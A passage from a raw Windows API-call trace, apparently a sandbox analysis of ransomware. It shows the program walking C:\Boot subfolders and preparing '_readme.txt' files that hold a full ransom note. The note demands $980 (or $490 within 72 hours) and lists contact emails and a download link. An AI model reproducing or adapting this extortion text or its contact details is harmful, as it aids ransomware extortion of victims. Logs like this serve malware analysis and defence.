dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0180.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0180.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.286] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*" (normalized: "c:\\boot\\nb-no\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.287] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.287] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0180.287] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0180.287] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0180.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0180.288] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0180.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.303] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0180.303] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0180.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.303] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.303] PathFindFileNameW (pszPath="") returned="" [0180.303] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.304] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.304] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.304] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.304] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0180.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.304] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0180.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0180.305] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.305] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0180.305] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0180.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0180.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.307] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*" (normalized: "c:\\boot\\nl-nl\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.308] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.308] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0180.308] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0180.308] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0180.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0180.309] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0180.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 